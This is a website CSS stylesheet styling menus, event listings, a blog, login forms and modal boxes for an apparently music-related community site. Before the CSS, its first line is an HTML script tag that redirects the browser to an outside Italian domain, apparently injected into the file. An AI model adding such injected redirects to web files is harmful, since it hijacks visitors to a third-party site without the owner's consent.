
<script type="text/javascript"> window.location.href="http://www.mioteam.it"; </script>body {
	margin:0px;
	margin-left:5px;
	padding:0px;
	font-family: Tahoma;
	font-size: 22px;
	color: white;
	text-align: left;
	background-image:none;
	/* width: 1903px; */
}


img {
	border:0px solid black;
}

a {
	color: #ad1538;
	font-family: Tahoma;
	font-size: 22px;
}

#wrapper_home {
	width: 930px;
	margin:0px auto;
	background-color:#090909;
	background-image:url(img/background_home_2.jpg);
	background-repeat:no-repeat;
	min-height:1000px; height:auto !important; height:1000px;
}

#wrapper_inner {
	width: 930px;
	margin:0px auto;
	background-color:#090909;
	/* background-image:url(img/background_home_2.jpg); */
	background-repeat:no-repeat;
	min-height:1000px; height:auto !important; height:1000px;
}

#inner_wrapper {
	margin: 200px 0px 0px 0px;
}

ul#rd_topmenu {
	background-color:#ad1538;
	margin-left: auto;
	margin-right: 0px;
	text-align: right;
	list-style-type: none;
	margin-top: 0px;
}

ul#rd_topmenu li {
	display: inline;
	margin-left: 10px;
}

ul#rd_topmenu li a {
	font-family: Tahoma;
	font-size: 22px;
	color: white;
	text-decoration: none;
	text-shadow: 0 1px 0 rgba(0, 0, 0, 0.6),0 0 6px rgba(143, 181, 200, 1),0 0 30px rgba(143, 181, 200, .7);
	outline: none;
	text-decoration:none;
}

#rd_home_logocontainer {
	width:400px;
	margin:0 auto;
	/* background-color:white; */
	/* Fallback for web browsers that doesn't support RGBa */
	background: rgb(255, 255, 255);
	/* RGBa with 0.6 opacity */
	background: rgba(255, 255, 255, 0.4);
}

#rd_inner_logocontainer {
	width:400px;
	margin:0 auto;
	/* background-color:white; */
	/* Fallback for web browsers that doesn't support RGBa */
	background: rgb(255, 255, 255);
	/* RGBa with 0.6 opacity */
	/* background: rgba(255, 255, 255, 0.4); */
	background: white;
}

img#rd_homelogo {
	display: block;
	margin-left: auto;
	margin-right: auto;
	width: 400px;
}

h2.h2_home {
	font-family: Tahoma;
	font-size: 30px;
	color: white;
	text-decoration: none;
	text-shadow: 0 1px 0 rgba(0, 0, 0, 0.6),0 0 6px rgba(143, 181, 200, 1),0 0 30px rgba(143, 181, 200, .8);
	outline: none;
	text-decoration:none;

}

h2.h2_inner {
	font-family: Tahoma;
	font-size: 30px;
	color: white;
	text-decoration: none;
	text-shadow: 0 1px 0 rgba(0, 0, 0, 0.6),0 0 6px rgba(143, 181, 200, 1),0 0 30px rgba(143, 181, 200, .8);
	outline: none;
	text-decoration:none;
	text-align:center;

}

#home_main {
	width: 800px;
	margin:0px auto;
	/* Fallback for web browsers that doesn't support RGBa */
	background: rgb(0, 0, 0);
	/* RGBa with 0.6 opacity */
	background: rgba(0, 0, 0, 0.6);
	min-height:200px; height:auto !important; height:200px;
}

#home_main a{
	text-decoration:none;
	font-size: 30px;
	text-shadow: 0 1px 0 rgba(0, 0, 0, 0.6),0 0 6px rgba(173, 21, 56, 1),0 0 30px rgba(173, 21, 56, .8);
	
}

#home_panel {
	width:870px;
	margin-top: 40px;
	margin-bottom: 20px;
	padding:10px 10px 10px 10px;
}

#home_contribute {
	text-align: center;
}

#today {
	margin: 0px 0px 10px 0px;
	padding-top: 20px;
	text-align: center;
}

#events_list_home {
	width: 910px;
	margin:0px 0px 0px 0px;
	min-height:400px; height:auto !important; height:400px;
	background: #090909;
}

#events_list {
	width: 910px;
	margin:0px 0px 0px 0px;
	/* Fallback for web browsers that doesn't support RGBa */
	background: rgb(0, 0, 0); 
	/* RGBa with 0.6 opacity */
	/* background: rgba(0, 0, 0, 0.6); */
	min-height:870px; height:auto !important; height:870px;
	background-image:url(img/guitar_back1.jpg);
	background-repeat:no-repeat;

}

.event_bkgd {
	width:800px;
	/* max-height:270px; */
	margin:0 auto;
	margin-bottom: 20px;
	padding:10px 10px 10px 10px;
}

.event {
	width:100%;
	padding:10px 10px 10px 10px;
	border-radius: 6px;
	/* background-color:black; */
	/* Fallback for web browsers that doesn't support RGBa */
	background: rgb(0, 0, 0); 
	/* RGBa with 0.6 opacity */
	background: rgba(0, 0, 0, 0.6); 
	text-shadow: 0 1px 0 rgba(0, 0, 0, 0.6),0 0 6px rgba(173, 21, 56, 1),0 0 30px rgba(173, 21, 56, .6); 
	
}

div.rd_event_img {
    float: left;
    width: 200px;
}

div.rd_event_img img {
    width: 200px;
}

div.rd_event_wimg_detailsbox {
    float: right;
    width: 590px;
    margin-left:10px;
}

div.rd_event_noimg_detailsbox {
    float: left;
    width: 790px;
    margin-left:10px;
}

div.rd_event_wimg_authorbox {
    float: right;
    width: 590px;
    margin-left:10px;
    margin-top:30px;
}

div.rd_event_noimg_authorbox {
    float: left;
    width: 790px;
    margin-left:10px;
    margin-top:30px;
}

div.rd_event_authorimg {
    float: left;
    width: 50px;
}
div.rd_event_wimg_authorlabel {
    float: right;
    width: 530px;
    margin-left:10px;

}
div.rd_event_noimg_authorlabel {
    float: right;
    width: 730px;
    margin-left:10px;

}
a.author_label {
    font-size:10px;
    font-weight:bold;

}

img.rd_useravatar_small {
   vertical-align:text-top;
   height:50px;
}

.fan_button {
	float: right;
}

.likes_count {
	font-size:16px;
	display: inline;
}


#inner_container {
	width: 890px;
	margin:0px auto;
	padding:50px 20px 10px 20px;
	/* Fallback for web browsers that doesn't support RGBa */
	/* background: rgb(0, 0, 0); */
	/* RGBa with 0.6 opacity */
	/* background: rgba(0, 0, 0, 0.6); */
	min-height:400px; height:auto !important; height:400px;
	background: #090909;
}

#inner_panel {
	width:870px;
	margin-top: 40px;
	margin-bottom: 20px;
	padding:10px 10px 10px 10px;
	background:black;
}


.rd_formlabel {
	margin: 30px 0px 00px 0px;
	
}

.rd_forminput {
	margin: 5px 0px 20px 0px;
}

/* TAG CLOUD */

#agrk_all_cloud {
	background-color:#000000;
}

a.agrk_tag_cloud {
	font-family: Tahoma;
	background-color:#000000;
	color: white;
}

a.agrk_tag_cloud:link {
	font-family: Tahoma;
	background-color:inherit;
	color: inherit;
}

a.agrk_tag_cloud:selected{
	font-family: Tahoma;
	background-color:inherit;
	color: inherit;
}

a.agrk_tag_cloud:visited{
	font-family: Tahoma;
	background-color:inherit;
	color: inherit;
}

a.agrk_tag_cloud:hover{
	font-family: Tahoma;
	background-color:#ad1538;
	color: inherit;
}

/* BLOG */

#blog_content {
	background-image:url(img/guitar_back2.jpg);
	background-repeat:no-repeat;
	
}

.agrk_panel_1_colsx2ctop {
	/* height: 0px; */ 
	width: 890px;
}
.agrk_panel_1_colsx2cbot {
	/* height: 0px; */
	width: 890px;
}
.agrk_panel_1_colsx2ctitle {
	visibility: hidden; 
	height: 0px;
	background: inherit;
}

#agrk_signup .agrk_panel_1_colsx2ctitle {
	visibility: visible; 
	height: auto;
	background: inherit;
	padding:0px 0px 0px 0px;
	color: #ad1538;
	font-size: 22px;
}

#agrk_leftcol2col div.agrk_adminlabel a{
	font-size:14px;
	margin-top:20px;
}

div.agrk_panel_1_colsx2cpagehelp {
	visibility: hidden; 
	height: 0px;
	width: 100%;
	margin: 0px ;
	padding: 0px;
}

#agrk_signup div.agrk_panel_1_colsx2cpagehelp {
	visibility: visible; 
	height: auto;
	width: 100%;
	margin: 40px 0px 0px 0px;
	padding: 0px;
	font-family: Tahoma;
	font-size:18px;
}


div#agrk_maincontent2col {
	background-color: #090909;
}

#agrk_maincontent2col #agrk_leftcol2col {
	background-color: #090909;
	width: 100%;
	float: none;
}

div.agrk_panel_2_positive_colsx2cbot {
	margin: 0px;
	padding: 0px;
	/* background-color: black; */
	/* Fallback for web browsers that doesn't support RGBa */
	background: rgb(0, 0, 0); 
	/* RGBa with 0.6 opacity */
	background: rgba(0, 0, 0, 0.6);
	
	border: 0px solid white;
	width: 890px;
}

div.agrk_panel_2_positive_colsx2ctop {
	margin: 15px;
	padding: 0px;
	/* background-color: black; */
	/* Fallback for web browsers that doesn't support RGBa */
	background: rgb(0, 0, 0); 
	/* RGBa with 0.6 opacity */
	background: rgba(0, 0, 0, 0.6);
	width: 855px;
}

div.agrk_panel_2_negative_colsx2cbot {
	margin: 0px;
	padding: 0px;
	/* background-color: black; */
	/* Fallback for web browsers that doesn't support RGBa */
	background: rgb(0, 0, 0); 
	/* RGBa with 0.6 opacity */
	background: rgba(0, 0, 0, 0.6);
	border: 0px solid white;
	width: 890px;
}

div.agrk_panel_2_negative_colsx2ctop {
	margin: 5px;
	padding: 0px;
	/* background-color: black; */
	/* Fallback for web browsers that doesn't support RGBa */
	background: rgb(0, 0, 0); 
	/* RGBa with 0.6 opacity */
	background: rgba(0, 0, 0, 0.6);
	width: 855px;
}


div.agrk_panel_3_colsx2cactions {
	margin: 0px;
	padding: 0px;
}

div.agrk_panel_3_colsx2ccontent {
	margin: 0px;
	padding: 0px;
}

#agrk_leftcol2col div#agrk_news_title {
	font-family: 'Trebuchet MS', Helvetica, sans-serif;
	color: white;
}

#agrk_leftcol2col span#agrk_news_bodytext  {
	font-family: 'Trebuchet MS', Helvetica, sans-serif;
	font-size: 14px;
	color: white;
}

div.agrk_panel_3_colsx2ccontent a {
	font-size: 14px;
}

#agrk_leftcol2col div.agrk_tagblock {
	visibility: hidden; 
	height: 0px;
}

#agrk_leftcol2col form.agrk_taginputform {
	visibility: hidden; 
	height: 0px;
}

/* My area */

#myarea_home {
	background-image:url(img/ticket_back1.jpg);
	background-repeat:no-repeat;
	min-height:870px; height:auto !important; height:870px;
	
	
}


.agrk_info {
	background-color: black;
}

#agrk_leftcol2col h3 {
color: white !important ;
border-bottom:2px solid #ad1538 !important;
}

.agrk_accesso h3 {
color: white !important ;
border-bottom: 2px solid white !important ;
}

.agrk_personali h3 {
color: white !important ;
border-bottom: 2px solid white !important ;
}

.agrk_accesso{
	background-color: #494949 !important ;
}

.agrk_pwrequest a {
  font-size: 14px;
  font-family:Tahoma; 
}
.agrk_personali{
	background-color: #797979 !important ;
}

.agrk_registra-btn{
	background-color: black !important ;
}

#agrk_leftcol2col div.agrk_forminput input {
	color: white !important;
}


div#agrk_signinform_signup_fb
{
  text-shadow: 0 1px 0 rgba(0, 0, 0, 0.6),0 0 6px rgba(173, 21, 56, 1),0 0 30px rgba(173, 21, 56, .6); 
  font-size: 24px;
  font-family:Tahoma; 
  color: #ad1538;
}

div#agrk_signinform_signup_fb a
{
  text-shadow: 0 1px 0 rgba(0, 0, 0, 0.6),0 0 6px rgba(173, 21, 56, 1),0 0 30px rgba(173, 21, 56, .6); 
  font-size: 24px;
  font-family:Tahoma; 
  color: #ad1538;
}

div.agrk_pwrequest {
  color: #ad1538;
  font: normal 8px Arial, Helvetica, sans-serif;

}

/*

Admin

*/

#agrk_leftcol2col div.agrk_upgradetitle {
	background-color: #090909 !important;
}

#agrk_leftcol2col div.agrk_formradiolabel {
	background-color: #090909 !important;
}

/*

 Generic controls for inputs
	
*/
input {
    border:2px solid black;
    border-radius:7px;
    font-size:20px;
    padding:5px; 
}

input:focus { 
    outline:none;
    border-color:#ad1538; 
    box-shadow:0 0 20px #ad1538; 
}

input:hover { 
    outline:none;
    border-color:#ad1538; 
    box-shadow:0 0 20px #ad1538; 
}


select {
    border:2px solid black;
    border-radius:7px;
    font-size:20px;
    padding:5px; 
}

select:focus { 
    outline:none;
    border-color:#ad1538;
    box-shadow:0 0 20px #ad1538;
}

select:hover { 
    outline:none;
    border-color:#ad1538;
    box-shadow:0 0 20px #ad1538;
}

textarea {
    border:2px solid black;
    border-radius:7px;
    font-size:20px;
    padding:5px; 
}

textarea:focus { 
    outline:none;
    border-color:#ad1538;
    box-shadow:0 0 20px #ad1538;
}

textarea:hover { 
    outline:none;
    border-color:#ad1538;
    box-shadow:0 0 20px #ad1538;
}

/* Modal Window */
.tbox {position:absolute; display:none; color:black; padding:14px 17px; z-index:900}
.tinner {padding:15px; -moz-border-radius:5px; border-radius:5px; background:#fff url(img/preload.gif) no-repeat 50% 50%; border-right:1px solid #333; border-bottom:1px solid #333}
.tmask {position:absolute; display:none; top:0px; left:0px; height:auto; width:100%; background:#000; z-index:800}
.tclose {position:absolute; top:0px; right:0px; width:30px; height:30px; cursor:pointer; background:url(img/close.png) no-repeat}
.tclose:hover {background-position:0 -30px}

#whatsthis {margin:0px 0px 0px 0px; padding: 0px; float: left;	text-decoration: none;
	text-shadow: 0 1px 0 rgba(0, 0, 0, 0.6),0 0 6px rgba(143, 181, 200, 1),0 0 30px rgba(143, 181, 200, .7);
}
#whatsthis li{list-style:none;}
#error {background:#ff6969; color:#fff; text-shadow:1px 1px #cf5454; border-right:1px solid #000; border-bottom:1px solid #000; padding:0}
#error .tcontent {padding:10px 14px 11px; border:1px solid #ffb8b8; -moz-border-radius:5px; border-radius:5px}
#success {background:#2ea125; color:#fff; text-shadow:1px 1px #1b6116; border-right:1px solid #000; border-bottom:1px solid #000; padding:10; -moz-border-radius:0; border-radius:0}
#bluemask {background:#4195aa}
#frameless {padding:0}
#frameless .tclose {left:6px}